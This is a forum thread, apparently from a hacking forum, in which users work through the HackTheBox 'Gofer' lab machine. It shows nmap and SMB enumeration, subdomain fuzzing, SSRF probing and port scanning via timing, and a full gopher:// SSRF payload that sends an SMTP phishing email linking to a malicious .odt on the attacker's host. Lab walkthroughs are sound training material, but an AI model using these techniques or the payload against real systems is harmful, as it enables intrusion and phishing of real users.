Possibly Related Threads…

chickensaladsand · Jul 30, 2023, 07:10 AM

How are y'all doing with this one?

└──╼ [★]$ nmap -T5 10.129.253.60 -sVC -p22,25,80,139,445

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 08:06 BST

Nmap scan report for 10.129.253.60

Host is up (0.012s latency).

PORT    STATE    SERVICE    VERSION

22/tcp  open    ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)

| ssh-hostkey: 

|  3072 aa25826eb804b6a9a95e1a91f09451dd (RSA)

|  256 1821baa7dce44f60d781039a5dc2e596 (ECDSA)

|_  256 a42d0d45132a9e7f867af6f778bc42d9 (ED25519)

25/tcp  filtered smtp

80/tcp  open    http        Apache httpd 2.4.56

|_http-server-header: Apache/2.4.56 (Debian)

|_http-title: Did not follow redirect to http://gofer.htb/

139/tcp open    netbios-ssn Samba smbd 4.6.2

445/tcp open    netbios-ssn Samba smbd 4.6.2

Service Info: Host: gofer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

| smb2-time: 

|  date: 2023-07-30T07:06:37

|_  start_date: N/A

|_nbstat: NetBIOS name: GOFER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

| smb2-security-mode: 

|  311: 

|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: he post combolist in database forum

4ip0k · (This post was last modified: Jul 30, 2023, 09:18 AM by 4ip0k.)

Okay, then try to scan SMB

$ smbmap -H 10.129.251.208 -u " "
[+] Guest session IP: 10.129.251.208:445 Name: gofer.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
shares READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.13.13-Debian)

there is anonymous access to the `shares` folder, let's see what's in it

$ smbclient -N //10.129.251.208/shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 28 23:32:08 2022
.. D 0 Fri Apr 28 15:59:34 2023
.backup DH 0 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032316 blocks available

smb: \> cd .backup
smb: \.backup\> ls
. D 0 Thu Apr 27 16:49:32 2023
.. D 0 Fri Oct 28 23:32:08 2022
mail N 1101 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032312 blocks available

smb: \.backup\> get mail
getting file \.backup\mail of size 1101 as mail (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)

$ cat mail
From jdavis@gofer.htb Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
by gofer.htb (Postfix) with SMTP id C8F7461827
for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. That's why from now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt format, as documents saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seems to me that it should be possible to do so via <Limit>

We became aware of a few things
1) there is a proxy
2) you need to use .odt files
3) mail works within the company

Let's find a proxy

$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://gofer.htb" -H "Host: FUZZ.gofer.htb" -fw 20

[Status: 401, Size: 462, Words: 42, Lines: 15, Duration: 138ms]
* FUZZ: proxy

Add in `/etc/hosts`

Then scan the directory from http://gofer.htb.

$ dirsearch -u http://gofer.htb/

[12:55:13] 301 - 307B - /assets -> http://gofer.htb/assets/
[12:55:13] 200 - 2KB - /assets/
[12:55:30] 200 - 29KB - /index.html

open a browser and follow the link. I have not gone further yet, I analyze what I found.

betecito · Jul 30, 2023, 06:49 PM

(Jul 30, 2023, 01:08 PM)th3unknown Wrote:
(Jul 30, 2023, 09:14 AM)4ip0k Wrote: Okay, then try to scan SMB

$ smbmap -H 10.129.251.208 -u " "
[+] Guest session IP: 10.129.251.208:445 Name: gofer.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
shares READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.13.13-Debian)

there is anonymous access to the `shares` folder, let's see what's in it

$ smbclient -N //10.129.251.208/shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 28 23:32:08 2022
.. D 0 Fri Apr 28 15:59:34 2023
.backup DH 0 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032316 blocks available

smb: \> cd .backup
smb: \.backup\> ls
. D 0 Thu Apr 27 16:49:32 2023
.. D 0 Fri Oct 28 23:32:08 2022
mail N 1101 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032312 blocks available

smb: \.backup\> get mail
getting file \.backup\mail of size 1101 as mail (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)

$ cat mail
From jdavis@gofer.htb Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
by gofer.htb (Postfix) with SMTP id C8F7461827
for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. That's why from now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt format, as documents saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seems to me that it should be possible to do so via <Limit>

We became aware of a few things
1) there is a proxy
2) you need to use .odt files
3) mail works within the company

Let's find a proxy

$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://gofer.htb" -H "Host: FUZZ.gofer.htb" -fw 20

[Status: 401, Size: 462, Words: 42, Lines: 15, Duration: 138ms]
* FUZZ: proxy

Add in `/etc/hosts`

Then scan the directory from http://gofer.htb.

$ dirsearch -u http://gofer.htb/

[12:55:13] 301 - 307B - /assets -> http://gofer.htb/assets/
[12:55:13] 200 - 2KB - /assets/
[12:55:30] 200 - 29KB - /index.html

open a browser and follow the link. I have not gone further yet, I analyze what I found.

I'm stuck in this point.... any hints?

First of all, sorry for my English. It seems that in proxy.gofer.htb there is an ssrf

└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.132.2 - - [30/Jul/2023 14:45:54] "GET /test.txt HTTP/1.1" 200 -

curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=10.10.14.112/test.txt"
* Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=10.10.14.112/test.txt HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 18:45:57 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 39
< Content-Type: text/html; charset=UTF-8
<

Hello
* Connection #0 to host proxy.gofer.htb left intact
1

kidarala · Jul 30, 2023, 06:52 PM

(Jul 30, 2023, 07:10 AM)chickensaladsand Wrote: How are y'all doing with this one?

└──╼ [★]$ nmap -T5 10.129.253.60 -sVC -p22,25,80,139,445 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 08:06 BST Nmap scan report for 10.129.253.60 Host is up (0.012s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 aa25826eb804b6a9a95e1a91f09451dd (RSA) | 256 1821baa7dce44f60d781039a5dc2e596 (ECDSA) |_ 256 a42d0d45132a9e7f867af6f778bc42d9 (ED25519) 25/tcp filtered smtp 80/tcp open http Apache httpd 2.4.56 |_http-server-header: Apache/2.4.56 (Debian) |_http-title: Did not follow redirect to http://gofer.htb/ 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 Service Info: Host: gofer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-time: | date: 2023-07-30T07:06:37 |_ start_date: N/A |_nbstat: NetBIOS name: GOFER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) | smb2-security-mode: | 311: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds

okkkkkkkkkkkkkkkkkkkkk

cutty · Jul 30, 2023, 06:53 PM

(Jul 30, 2023, 06:49 PM)betecito Wrote:
(Jul 30, 2023, 01:08 PM)th3unknown Wrote:
(Jul 30, 2023, 09:14 AM)4ip0k Wrote: Okay, then try to scan SMB

$ smbmap -H 10.129.251.208 -u " "
[+] Guest session IP: 10.129.251.208:445 Name: gofer.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
shares READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.13.13-Debian)

there is anonymous access to the `shares` folder, let's see what's in it

$ smbclient -N //10.129.251.208/shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 28 23:32:08 2022
.. D 0 Fri Apr 28 15:59:34 2023
.backup DH 0 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032316 blocks available

smb: \> cd .backup
smb: \.backup\> ls
. D 0 Thu Apr 27 16:49:32 2023
.. D 0 Fri Oct 28 23:32:08 2022
mail N 1101 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032312 blocks available

smb: \.backup\> get mail
getting file \.backup\mail of size 1101 as mail (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)

$ cat mail
From jdavis@gofer.htb Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
by gofer.htb (Postfix) with SMTP id C8F7461827
for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. That's why from now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt format, as documents saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seems to me that it should be possible to do so via <Limit>

We became aware of a few things
1) there is a proxy
2) you need to use .odt files
3) mail works within the company

Let's find a proxy

$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://gofer.htb" -H "Host: FUZZ.gofer.htb" -fw 20

[Status: 401, Size: 462, Words: 42, Lines: 15, Duration: 138ms]
* FUZZ: proxy

Add in `/etc/hosts`

Then scan the directory from http://gofer.htb.

$ dirsearch -u http://gofer.htb/

[12:55:13] 301 - 307B - /assets -> http://gofer.htb/assets/
[12:55:13] 200 - 2KB - /assets/
[12:55:30] 200 - 29KB - /index.html

open a browser and follow the link. I have not gone further yet, I analyze what I found.

I'm stuck in this point.... any hints?

First of all, sorry for my English. It seems that in proxy.gofer.htb there is an ssrf

└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.132.2 - - [30/Jul/2023 14:45:54] "GET /test.txt HTTP/1.1" 200 -

curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=10.10.14.112/test.txt"
* Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=10.10.14.112/test.txt HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 18:45:57 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 39
< Content-Type: text/html; charset=UTF-8
<

Hello
* Connection #0 to host proxy.gofer.htb left intact
1

It is. So you want to use the gopher protocol to craft an ssrf payload based on the information in the email found on smb.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad.onion/contact if you feel this is incorrect.

betecito · Jul 30, 2023, 07:14 PM

(Jul 30, 2023, 06:53 PM)cutty Wrote:
(Jul 30, 2023, 06:49 PM)betecito Wrote:
(Jul 30, 2023, 01:08 PM)th3unknown Wrote:
(Jul 30, 2023, 09:14 AM)4ip0k Wrote: Okay, then try to scan SMB

$ smbmap -H 10.129.251.208 -u " "
[+] Guest session IP: 10.129.251.208:445 Name: gofer.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
shares READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.13.13-Debian)

there is anonymous access to the `shares` folder, let's see what's in it

$ smbclient -N //10.129.251.208/shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 28 23:32:08 2022
.. D 0 Fri Apr 28 15:59:34 2023
.backup DH 0 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032316 blocks available

smb: \> cd .backup
smb: \.backup\> ls
. D 0 Thu Apr 27 16:49:32 2023
.. D 0 Fri Oct 28 23:32:08 2022
mail N 1101 Thu Apr 27 16:49:32 2023

5061888 blocks of size 1024. 2032312 blocks available

smb: \.backup\> get mail
getting file \.backup\mail of size 1101 as mail (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)

$ cat mail
From jdavis@gofer.htb Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
by gofer.htb (Postfix) with SMTP id C8F7461827
for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. That's why from now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt format, as documents saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seems to me that it should be possible to do so via <Limit>

We became aware of a few things
1) there is a proxy
2) you need to use .odt files
3) mail works within the company

Let's find a proxy

$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://gofer.htb" -H "Host: FUZZ.gofer.htb" -fw 20

[Status: 401, Size: 462, Words: 42, Lines: 15, Duration: 138ms]
* FUZZ: proxy

Add in `/etc/hosts`

Then scan the directory from http://gofer.htb.

$ dirsearch -u http://gofer.htb/

[12:55:13] 301 - 307B - /assets -> http://gofer.htb/assets/
[12:55:13] 200 - 2KB - /assets/
[12:55:30] 200 - 29KB - /index.html

open a browser and follow the link. I have not gone further yet, I analyze what I found.

I'm stuck in this point.... any hints?

First of all, sorry for my English. It seems that in proxy.gofer.htb there is an ssrf

└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.132.2 - - [30/Jul/2023 14:45:54] "GET /test.txt HTTP/1.1" 200 -

curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=10.10.14.112/test.txt"
* Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=10.10.14.112/test.txt HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 18:45:57 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 39
< Content-Type: text/html; charset=UTF-8
<

Hello
* Connection #0 to host proxy.gofer.htb left intact
1

It is. So you want to use the gopher protocol to craft an ssrf payload based on the information in the email found on smb.

a detail... to perform a port scan through ssrf... observe the milliseconds to respond

Closed port:
└─# curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=127.0.0.1:1001" -s -w %{time_total}
* Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=127.0.0.1:1001 HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 19:11:15 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 32
< Content-Type: text/html; charset=UTF-8
<

* Connection #0 to host proxy.gofer.htb left intact
0.067617

Open Port:
└─# curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=127.0.0.1:25" -s -w %{time_total}
* Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=127.0.0.1:25 HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 19:12:05 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 32
< Content-Type: text/html; charset=UTF-8
<

* Connection #0 to host proxy.gofer.htb left intact
0.146736

frfrfrfrfrfrf · Jul 30, 2023, 07:20 PM

use gopher

frfrfrfrfrfrf · Jul 30, 2023, 07:35 PM

try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

betecito · Jul 30, 2023, 07:38 PM

(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

wow, that's good! thanks a lot

frfrfrfrfrfrf · Jul 30, 2023, 07:46 PM

by the way there is also a lfi in the url parameter but it is not the way to root the machine.

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	602	91,758	5 hours ago Last Post: sabero_exe
	[FREE] CPTS 12 FLAGS	pulsebreaker	68	1,959	Yesterday, 09:54 AM Last Post: VictorPipeau
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	371	92,893	Yesterday, 08:48 AM Last Post: phannguyenbaouy1
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,621	Yesterday, 05:08 AM Last Post: popoler
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,271	Apr 30, 2026, 02:10 PM Last Post: kkkato